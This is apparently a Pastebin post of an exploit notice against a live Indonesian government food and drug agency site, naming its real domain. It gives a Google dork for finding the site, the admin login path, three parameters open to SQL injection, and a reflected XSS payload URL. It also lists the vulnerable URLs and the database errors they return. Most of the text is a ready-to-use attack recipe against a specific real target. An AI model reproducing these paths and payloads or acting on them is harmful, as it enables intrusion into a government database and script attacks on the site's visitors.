API tools faq
paste
Advertisement
KingSkrupellos

Badan Pengawas Obat dan Makanan Indonesia XSS SQL Inj

KingSkrupellos
May 2nd, 2019
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################
  2.  
  3. # Exploit Title : Badan Pengawas Obat dan Makanan Republik Indonesia XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/05/2019
  7. # Vendor Homepage : notifkos.pom.go.id
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Notifkos Badan Pengawas Obat dan Makanan Republik Indonesia site:go.id
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18. # Reference Link : cxsecurity.com/issue/WLB-2019050025
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. Badan Pengawas Obat dan Makanan Republik Indonesia is prone to an SQL-injection
  25. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  26. it in an SQL query. Exploiting this issue could allow an attacker to compromise
  27. the application, access or modify data, or exploit latent vulnerabilities in the
  28. underlying database. A remote attacker can send a specially crafted request to the
  29. vulnerable application and execute arbitrary SQL commands in application`s database.
  30. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. Reflected XSS (or Non-Persistent) :
  34. ***************************************
  35. The server reads data directly from the HTTP
  36. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  37. attacker causes a victim to supply dangerous content to a vulnerable web application,
  38. which is then reflected back to the victim and executed by the web browser. The most common
  39. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  40. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  41. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  42. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  43. the content is executed by the victim's browser.
  44.  
  45. ###################################################################
  46.  
  47. # Admin Panel Login Path :
  48. ************************
  49. /new/login
  50.  
  51. # SQL Injection Exploit :
  52. **********************
  53. /bpom-notifikasi/product_notif.php?id=[SQL Injection]
  54.  
  55. /bpom-notifikasi/news.php?id=[SQL Injection]
  56.  
  57. /bpom-notifikasi/product_batal.php?id=[SQL Injection]
  58.  
  59. # Cross Site Scripting XSS Exploit :
  60. *******************************
  61. /bpom-notifikasi/product_notif.php?id=1%27<marquee><font%20color=
  62. lime%20size=32>XSS-Vulnerability-Discovered-By%20KingSkrupellos</font></marquee>
  63.  
  64. ###################################################################
  65.  
  66. # Example Vulnerable Sites :
  67. *************************
  68. Badan Pengawas Obat dan Makanan Republik Indonesia
  69.  
  70. [+] notifkos.pom.go.id/bpom-notifikasi/product_notif.php?id=1%27
  71.  
  72. [+] notifkos.pom.go.id/bpom-notifikasi/product_notif.php?id=1%27<marquee><font%20color=
  73. lime%20size=32>XSS-Vulnerability-Discovered-By%20KingSkrupellos</font></marquee>
  74.  
  75. ###################################################################
  76.  
  77. # Example SQL Database Error :
  78. ****************************
  79. You have an error in your SQL syntax; check the manual that corresponds
  80. to your MySQL server version for the right syntax to use near 'Pemberitahuan
  81. Notifikasi%' OR title LIKE 'Pemberitahuan Nomor Notifikasi%' OR ti' at line 2
  82.  
  83. You have an error in your SQL syntax; check the manual that corresponds
  84. to your MySQL server version for the right syntax to use near ''7'' limit 1' at line 1
  85.  
  86. ###################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!